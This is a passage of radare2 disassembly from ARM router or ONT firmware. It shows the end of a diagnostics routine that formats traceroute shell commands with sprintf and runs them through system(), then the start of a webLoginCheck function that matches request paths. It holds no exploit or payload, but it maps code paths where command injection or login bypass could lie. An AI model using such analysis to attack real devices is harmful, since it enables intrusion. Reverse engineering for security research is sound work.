| 0x0001aa1c 0400a0e1 mov r0, r4
| 0x0001aa20 50bbffeb bl sym.imp.sprintf ; int sprintf(char *s,
| 0x0001aa24 0400a0e1 mov r0, r4
| 0x0001aa28 88baffeb bl sym.imp.system ; int system(const char *string)
| 0x0001aa2c 78309fe5 ldr r3, aav.0x00028718 ; [0x1aaac:4]=0x28718 aav.0x00028718
| 0x0001aa30 98104be2 sub r1, fp, 0x98
| 0x0001aa34 240093e5 ldr r0, [r3, 0x24]
| 0x0001aa38 c0baffeb bl sym.imp.VOS_Host2Str
| 0x0001aa3c c0109fe5 ldr r1, str.traceroute__n__I__s__s__s_1___s_2__1 ; [0x1ab04:4]=0x26260 str.traceroute__n__I__s__s__s_1___s_2__1
| 0x0001aa40 70209fe5 ldr r2, aav.0x000286b8 ; [0x1aab8:4]=0x286b8 aav.0x000286b8
| 0x0001aa44 0030a0e1 mov r3, r0
| 0x0001aa48 0400a0e1 mov r0, r4
| ; JMP XREF from 0x0001a8a4 (aav.0x0001a684 + 544)
| 0x0001aa4c 00508de5 str r5, [sp]
| 0x0001aa50 44bbffeb bl sym.imp.sprintf ; int sprintf(char *s,
,==< 0x0001aa54 030000ea b 0x1aa68
|| ; JMP XREF from 0x0001a870 (aav.0x0001a684 + 492)
|| ; JMP XREF from 0x0001aa0c (aav.0x0001a684 + 904)
|`-> 0x0001aa58 0520a0e1 mov r2, r5
| 0x0001aa5c 0400a0e1 mov r0, r4
| 0x0001aa60 a0109fe5 ldr r1, str.echo__No_traceroute_test.__________s ; [0x1ab08:4]=0x26198 str.echo__No_traceroute_test.__________s
| 0x0001aa64 3fbbffeb bl sym.imp.sprintf ; int sprintf(char *s,
| ; JMP XREF from 0x0001aa54 (aav.0x0001a684 + 976)
`--> 0x0001aa68 0400a0e1 mov r0, r4
0x0001aa6c 664f4be2 sub r4, fp, 0x198
0x0001aa70 76baffeb bl sym.imp.system ; int system(const char *string)
0x0001aa74 90109fe5 ldr r1, str.echo__ping_traceroute_finished.________s ; [0x1ab0c:4]=0x26288 str.echo__ping_traceroute_finished.________s
0x0001aa78 24209fe5 ldr r2, str.tmp_.web_diag.txt ; [0x1aaa4:4]=0x26020 str.tmp_.web_diag.txt
0x0001aa7c 0400a0e1 mov r0, r4
0x0001aa80 38bbffeb bl sym.imp.sprintf ; int sprintf(char *s,
0x0001aa84 0400a0e1 mov r0, r4
; JMP XREF from 0x0001a950 (aav.0x0001a684 + 716)
0x0001aa88 70baffeb bl sym.imp.system ; int system(const char *string)
0x0001aa8c 28309fe5 ldr r3, aav.0x00028670 ; [0x1aabc:4]=0x28670 aav.0x00028670
0x0001aa90 0220a0e3 mov r2, 2 ; 2
0x0001aa94 002083e5 str r2, [r3]
; JMP XREF from 0x0001a798 (aav.0x0001a684 + 276)
0x0001aa98 0000a0e3 mov r0, 0
0x0001aa9c 24d04be2 sub sp, fp, 0x24
0x0001aaa0 f0ad9de8 ldm sp, {r4, r5, r6, r7, r8, sl, fp, sp, pc}
; XREFS: DATA 0x0001a6a8 DATA 0x0001a784 DATA 0x0001a7d0 DATA 0x0001a86c DATA 0x0001a8c4 DATA 0x0001a940 DATA 0x0001a960 DATA 0x0001aa08
; XREFS: DATA 0x0001aa78
0x0001aaa4 .dword 0x00026020 ; str.tmp_.web_diag.txt
; DATA XREF from 0x0001a6b0 (aav.0x0001a684 + 44)
0x0001aaa8 .dword 0x0002866c ; aav.0x0002866c
; XREFS: DATA 0x0001a6b4 DATA 0x0001a808 DATA 0x0001a82c DATA 0x0001a878 DATA 0x0001a898 DATA 0x0001a9b0 DATA 0x0001aa2c
0x0001aaac .dword 0x00028718 ; aav.0x00028718
; DATA XREF from 0x0001a6d0 (aav.0x0001a684 + 76)
0x0001aab0 .dword 0x00026038 ; str.echo__Your_select_wan_ipv6_state_is_not_up_______s
; XREFS: DATA 0x0001a6d8 DATA 0x0001a734 DATA 0x0001a780 DATA 0x0001a7c8 DATA 0x0001a80c DATA 0x0001a87c DATA 0x0001a8d4 DATA 0x0001a918
; XREFS: DATA 0x0001a93c DATA 0x0001a958 DATA 0x0001a998 DATA 0x0001aa10
0x0001aab4 .dword 0x00028678 ; aav.0x00028678
; XREFS: DATA 0x0001a71c DATA 0x0001a7c4 DATA 0x0001a830 DATA 0x0001a89c DATA 0x0001a92c DATA 0x0001a954 DATA 0x0001a9c8 DATA 0x0001aa40
0x0001aab8 .dword 0x000286b8 ; aav.0x000286b8
; DATA XREF from 0x0001a770 (aav.0x0001a684 + 236)
; DATA XREF from 0x0001a8bc (aav.0x0001a684 + 568)
; DATA XREF from 0x0001aa8c (aav.0x0001a684 + 1032)
0x0001aabc .dword 0x00028670 ; aav.0x00028670
[0x00009870]> pd @ sym.webLoginCheck
/ (fcn) sym.webLoginCheck 1024
| sym.webLoginCheck ();
| ; var int local_48h @ fp-0x48
| ; var int local_44h @ fp-0x44
| ; var int local_40h @ fp-0x40
| ; var int local_3ch @ fp-0x3c
| ; var int local_0h @ sp+0x0
| ; var int local_4h @ sp+0x4
| ; var int local_8h @ sp+0x8
| ; var int local_ch @ sp+0xc
| ; UNKNOWN XREF from 0x000087e4 (section_end..hash + 900)
| 0x0000a2a8 0dc0a0e1 mov ip, sp
| 0x0000a2ac f0d92de9 push {r4, r5, r6, r7, r8, fp, ip, lr, pc}
| 0x0000a2b0 04b04ce2 sub fp, ip, 4
| 0x0000a2b4 3cd04de2 sub sp, sp, 0x3c ; '<'
| 0x0000a2b8 984090e5 ldr r4, [r0, 0x98]
| 0x0000a2bc 0060a0e1 mov r6, r0
| 0x0000a2c0 e0139fe5 ldr r1, str.style ; [0xa6a8:4]=0x20358 str.style
| 0x0000a2c4 0400a0e1 mov r0, r4
| 0x0000a2c8 3efdffeb bl sym.imp.strstr ; char*strstr(char *s1, const char *s2)
| 0x0000a2cc 000050e3 cmp r0, 0
| ,=< 0x0000a2d0 f000001a bne 0xa698
| | 0x0000a2d4 0400a0e1 mov r0, r4
| | 0x0000a2d8 cc139fe5 ldr r1, aav.0x00020360 ; [0xa6ac:4]=0x20360 aav.0x00020360
| | 0x0000a2dc 39fdffeb bl sym.imp.strstr ; char*strstr(char *s1, const char *s2)
| | 0x0000a2e0 000050e3 cmp r0, 0
| ,==< 0x0000a2e4 eb00001a bne 0xa698
| || 0x0000a2e8 0400a0e1 mov r0, r4
| || 0x0000a2ec bc139fe5 ldr r1, str.images ; [0xa6b0:4]=0x20368 str.images
| || 0x0000a2f0 34fdffeb bl sym.imp.strstr ; char*strstr(char *s1, const char *s2)
| || 0x0000a2f4 000050e3 cmp r0, 0
| ,===< 0x0000a2f8 e600001a bne 0xa698
| ||| 0x0000a2fc 0400a0e1 mov r0, r4
| ||| 0x0000a300 ac139fe5 ldr r1, str.ote ; [0xa6b4:4]=0x20370 str.ote
| ||| 0x0000a304 2ffdffeb bl sym.imp.strstr ; char*strstr(char *s1, const char *s2)
| ||| 0x0000a308 005050e2 subs r5, r0, 0
| ,====< 0x0000a30c 0500000a beq 0xa328
| |||| 0x0000a310 a0139fe5 ldr r1, [0x0000a6b8] ; [0xa6b8:4]=0xd005d
| |||| 0x0000a314 0120a0e3 mov r2, 1 ; 1
| |||| 0x0000a318 24304be2 sub r3, fp, 0x24
| |||| 0x0000a31c 042023e5 str r2, [r3, -4]!
| |||| 0x0000a320 022082e0 add r2, r2, r2
| ,=====< 0x0000a324 080000ea b 0xa34c
| ||||| ; JMP XREF from 0x0000a30c (sym.webLoginCheck)
| |`----> 0x0000a328 0400a0e1 mov r0, r4
| | ||| 0x0000a32c 88139fe5 ldr r1, str.otd ; [0xa6bc:4]=0x20378 str.otd
| | ||| 0x0000a330 24fdffeb bl sym.imp.strstr ; char*strstr(char *s1, const char *s2)
| | ||| 0x0000a334 000050e3 cmp r0, 0
| |,====< 0x0000a338 0800000a beq 0xa360
| ||||| 0x0000a33c 74139fe5 ldr r1, [0x0000a6b8] ; [0xa6b8:4]=0xd005d
| ||||| 0x0000a340 24304be2 sub r3, fp, 0x24
| ||||| 0x0000a344 045023e5 str r5, [r3, -4]!
| ||||| 0x0000a348 0220a0e3 mov r2, 2 ; 2
| ||||| ; JMP XREF from 0x0000a324 (sym.webLoginCheck)
| `-----> 0x0000a34c 04c0a0e3 mov ip, 4 ; 4
| |||| 0x0000a350 090aa0e3 mov r0, 0x9000
| |||| 0x0000a354 00c08de5 str ip, [sp]
| |||| 0x0000a358 42fcffeb bl sym.imp.VOS_SendMsg
| ,=====< 0x0000a35c c90000ea b 0xa688
| ||||| ; JMP XREF from 0x0000a338 (sym.webLoginCheck)
| |`----> 0x0000a360 0400a0e1 mov r0, r4
| | ||| 0x0000a364 54139fe5 ldr r1, str.tore ; [0xa6c0:4]=0x20380 str.tore
| | ||| 0x0000a368 16fdffeb bl sym.imp.strstr ; char*strstr(char *s1, const char *s2)
| | ||| 0x0000a36c 000050e3 cmp r0, 0
| |,====< 0x0000a370 0800000a beq 0xa398
| ||||| 0x0000a374 48039fe5 ldr r0, str.tmp_ont_need_reg ; [0xa6c4:4]=0x20388 str.tmp_ont_need_reg
| ||||| 0x0000a378 48139fe5 ldr r1, aav.0x00022650 ; [0xa6c8:4]=0x22650 aav.0x00022650
| ||||| 0x0000a37c 99fcffeb bl sym.imp.fopen ; file*fopen(const char *filename,
| ||||| 0x0000a380 005050e2 subs r5, r0, 0
| ,======< 0x0000a384 bf00000a beq 0xa688
| |||||| 0x0000a388 3c139fe5 ldr r1, aav.0x00024970 ; [0xa6cc:4]=0x24970 aav.0x00024970
| |||||| 0x0000a38c 48404be2 sub r4, fp, 0x48
| |||||| 0x0000a390 0400a0e1 mov r0, r4
| ,=======< 0x0000a394 0c0000ea b 0xa3cc
| ||||||| ; JMP XREF from 0x0000a370 (sym.webLoginCheck)
| |||`----> 0x0000a398 0400a0e1 mov r0, r4
| ||| ||| 0x0000a39c 2c139fe5 ldr r1, str.tord ; [0xa6d0:4]=0x203a0 str.tord
| ||| ||| 0x0000a3a0 08fdffeb bl sym.imp.strstr ; char*strstr(char *s1, const char *s2)
| ||| ||| 0x0000a3a4 007050e2 subs r7, r0, 0